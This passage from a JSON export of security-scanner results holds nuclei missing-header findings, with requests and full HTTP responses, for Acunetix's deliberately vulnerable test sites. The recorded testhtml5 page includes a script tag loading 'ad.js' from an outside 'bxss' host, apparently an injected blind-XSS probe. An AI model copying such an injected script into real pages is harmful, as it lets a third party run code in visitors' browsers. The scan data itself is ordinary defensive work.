*\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 418, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea/.name", + "discovered_date": "2024-11-13T02:41:03.311Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea/.name HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4f911cd6-6"\r\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\r\nServer: nginx/1.19.0\r\n\r\nacuart", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 419, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea", + "discovered_date": "2024-11-13T02:41:03.444Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:51 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /.idea/</title></head>\r\n<body>\r\n<h1>Index of /.idea/</h1><hr><pre><a href="../">../</a>\r\n<a href="scopes/">scopes/</a> 13-Nov-2012 13:29 -\r\n<a href="acuart.iml">acuart.iml</a> 20-Apr-2012 08:22 292\r\n<a href="encodings.xml">encodings.xml</a> 20-Apr-2012 08:22 171\r\n<a href="misc.xml">misc.xml</a> 20-Apr-2012 08:22 266\r\n<a href="modules.xml">modules.xml</a> 20-Apr-2012 08:22 275\r\n<a href="vcs.xml">vcs.xml</a> 20-Apr-2012 08:22 173\r\n<a href="workspace.xml">workspace.xml</a> 20-Apr-2012 08:23 12473\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 420, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:03.590Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 421, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/css", + "discovered_date": "2024-11-13T02:41:03.731Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/css HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 422, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:41:03.871Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 14069\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >\r\n<HTML>\r\n\t<HEAD>\r\n\t\t<title>acublog news</title>\r\n\t\t<META http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\t\t<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">\r\n\t\t<meta content="C#" name="CODE_LANGUAGE">\r\n\t\t<meta content="JavaScript" name="vs_defaultClientScript">\r\n\t\t<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">\r\n\t\t<LINK href="styles.css" type="text/css" rel="stylesheet">\r\n\t</HEAD>\r\n\t<body>\r\n\t\t<form name="Form1" method="post" action="default.aspx" id="Form1">\r\n<div>\r\n<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />\r\n<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />\r\n<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />\r\n</div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\nvar theForm = document.forms['Form1'];\r\nif (!theForm) {\r\n theForm = document.Form1;\r\n}\r\nfunction __doPostBack(eventTarget, eventArgument) {\r\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\r\n theForm.__EVENTTARGET.value = eventTarget;\r\n theForm.__EVENTARGUMENT.value = eventArgument;\r\n theForm.submit();\r\n }\r\n}\r\n//]]>\r\n</script>\r\n\r\n\r\n<div>\r\n\r\n\t<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />\r\n\t<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig" />\r\n</div>\r\n\t\t\t\r\n<TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>\r\n\t\t<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"\r\n\t\t\theight="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>\r\n\t</TR>\r\n</TABLE>\r\n<TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>\r\n\t\t\t<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">\r\n\t\t\t\tsignup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>\r\n\t\t\t\t<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>\r\n\t\t</TD>\r\n\t\t<td class="MenuBar" align="right" width="50px">\r\n\t\t\t<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>\r\n\t\t</td>\r\n\t</TR>\r\n</TABLE>\r\n\r\n\t\t\t<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD id="tdPageData" valign="top">\r\n\t\t\t\t\t<DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">(41) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>\r\n\r\n\t\t\t\t\t<TD vAlign="top" width="200">\r\n\t\t\t\t\t\t<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">\r\n\t<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">\r\n\t\t<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9040')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">November 2024</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9101')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>\r\n\t</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9066')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9067')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9068')" style="color:Black" title="October 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9069')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9070')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9071')" style="color:Black" title="November 01">1</a></td><td align="center" 